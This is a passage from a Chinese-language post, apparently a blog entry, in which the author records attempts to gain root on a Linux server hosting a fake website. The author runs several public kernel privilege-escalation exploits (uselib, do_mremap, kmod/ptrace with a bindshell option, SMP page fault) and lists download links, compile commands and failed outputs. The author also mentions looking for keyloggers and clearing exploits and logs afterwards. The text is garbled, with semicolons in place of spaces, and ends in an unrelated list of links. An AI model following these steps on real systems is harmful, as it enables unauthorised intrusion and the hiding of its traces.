http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件：
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
測試：
gcc;-O2;-fomit-frame-pointer;elflbl_v108.c;-o;elflbl_v108;
elflbl_v108.c:;In;function;`check_vma_flags’:;
elflbl_v108.c:545:;warning:;deprecated;use;of;label;at;end;of;compound;statement;
./elflbl_v108;
child;1;VMAs;0;
[ ];moved;stack;bff73000,;task_size=0xc0000000,;map_base=0xbf800000;
[ ];vmalloc;area;0xc7c00000;-;0xcf707000;
Wait...;-Segmentation;fault;
gcc;-O2;-fomit-frame-pointer;elflbl_v109.c;-o;elflbl_v109;
./elflbl_v109;
[ ];SLAB;cleanup;
[-];FAILED:;get_slab_objs:;/proc/slabinfo;not;readable?;(No;such;file;or;directory);
sh:;line;9:;24080;Killed;;;;;./elflbl_v109;
（3）Linux內(nèi)核本地整數(shù)溢出和內(nèi)存泄露漏洞
fun;with;linux;kernel
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
測試：
gcc;-o;vc;vc_resize.c;
./vc_resize;
open:;No;such;device;or;address;
gcc;memory_leak.c;-o;memory_leak;
memory_leak.c:80:2:;warning:;no;newline;at;end;of;file;
（4）Linux;Kernel;do_mremap;VMA本地權(quán)限提升漏洞
Linux;kernel;do_mremap;VMA;limit;local;privilege;escalation
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=提升
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件：
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
測試：
gcc;-O3;-static;-fomit-frame-pointer;mremap_pte.c;-o;mremap_pte;
./mremap_pte;
[ ];kernel;2.4.20-021stab022.11.777-enterprise;vulnerable:;YES;exploitable;YES;
MMAP;#65530;0x50bfa000;-;0x50bfb000;
[-];Failed;
（5）Linux;Kernel;kmod/ptrace競爭條件權(quán)限提升漏洞
linux;kmod/ptrace;bug;-;details
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=提升
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件：
http://august.v-lo.krakow.pl/~anszom/km3.c
測試：
gcc;-o;km3;km3.c;
./km3;?;
Usage:;./km3;[-d];[-b];[-r];[-s];[-c;executable];
-d;;;;;--;use;double-ptrace;method;(to;run;interactive;programs);
-b;;;;;--;start;bindshell;on;port;4112;
-r;;;;;--;support;randomized;pids;
-c;;;;;--;choose;executable;to;start;
-s;;;;;--;single-shot;mode;-;abort;if;unsuccessful;at;the;first;try;
./km3;-s;
Linux;kmod; ;ptrace;local;root;exploit;by;
=〉;Simple;mode,;executing;/usr/bin/id;〉;/dev/tty;
sizeof(shellcode)=95;
=〉;Child;process;started..........;
Failed;
（6）Linux;Kernel;i386;SMP頁錯誤處理器特權(quán)提升漏洞
Linux;kernel;i386;SMP;page;fault;handler;privilege;escalation
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
測試：
gcc;-o;smp;smp.c;
./smp;
[ ];in;thread;1;(pid;=;5400);
[ ];in;thread;2;(pid;=;5401);
[ ];rdtsc;calibration:;53428;
[ ];exploiting;race,;wait...;
[-];unable;to;exploit;race;in;30s,;
kernel;patched;or;load;too;high.;
嘗試多個本地提權(quán)均未能成功！很郁悶！而在測試過程的時候，虛假網(wǎng)站已經(jīng)被關(guān)閉了，雖然文件還在，但是很明顯官方已經(jīng)作了努力，并得到了不錯的結(jié)果 。
6、其他
找了幾個linux的鍵盤記錄，都要root權(quán)限 。而服務(wù)器遠(yuǎn)程連接使用的ssh的，使用sniffer也估計沒戲，所以暫時也沒什么思路，清理exp、日志文件 。
以上是我的一些測試的結(jié)果，結(jié)果也沒有拿到root，不過我整理了一下相關(guān)的漏洞，希望對大家以后有些幫助 。在站長群里發(fā)布了相關(guān)的結(jié)果，也沒有人回話，不知道大家是太忙 。。。

推薦閱讀

• 

  長豆角得炒多長時間能熟
• 

  后面帶黑字兩字詞語有哪些
• 

  微信視頻能保存下來嗎
• 

  荒野大鏢客2光追怎么開 荒野大鏢客2光追怎么打開
• 

  山姆會員店一次能進(jìn)幾個人-山姆會員店一次能進(jìn)2個人嗎
• 

  圓明園門票多少錢
• 

  長歌行劉宇寧和趙露思演的什么 長歌行劉宇寧和趙露思的角色簡介
• 

  maya鏡像復(fù)制的方法
• 

  唐國強(qiáng)前妻孫濤舊照資料，干什么工作演員嗎？自殺因壯麗是第三者？
• 

  支付寶鉑金會員厲害嗎？ 支付寶鉑金會員厲害嗎是真的嗎
• 

  ipad6,11是什么型號 ipad6,11的型號是什么
• 

  什么游戲類似lol,占據(jù)游戲半壁江山
• 

  通常說的a4紙是多少尺寸
• 

  南山竹海溫泉有優(yōu)惠嗎
• 

  遇見你的貓狗狗喜歡吃什么
• 

  怎么看出來癌癥 怎么知道癌癥痊愈沒有呢

• 中國銀行手機(jī)銀行怎么查卡號
• 中國銀行手機(jī)銀行怎么轉(zhuǎn)賬
• 中國銀行手機(jī)銀行怎么查開戶行
• 關(guān)于V188虛假信號,打不出接不到的問題
• 一條虛假的靜態(tài)默認(rèn)路由
• 路由表問題引起故障 虛假的靜態(tài)默認(rèn)路由
• 執(zhí)行中發(fā)現(xiàn)虛假訴訟怎么辦
• 什么是虛假同感偏差？
• 中國銀行中午休息嗎
• 虛假合同是無效合同嗎